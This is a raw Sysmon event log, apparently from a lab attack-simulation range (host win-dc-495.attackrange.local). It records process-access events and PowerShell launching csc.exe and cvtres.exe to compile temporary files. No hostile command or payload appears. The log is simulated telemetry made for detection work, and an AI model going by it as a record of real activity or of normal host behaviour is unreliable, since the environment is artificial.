13:33:20.169{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.169{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D002-00000000A201}42684384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D102-00000000A201}4244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES1511.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCA32CA1CCC6E04A50AB6294A1BC7C1AA5.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1F-6005-C788-100000000000}0x1088c70HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\t4kqsmcp.cmdline" 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.075{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.075{59A5CD1D-8E1F-6005-CE02-00000000A201}37204528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402DB68F) 154100x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.078{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths 
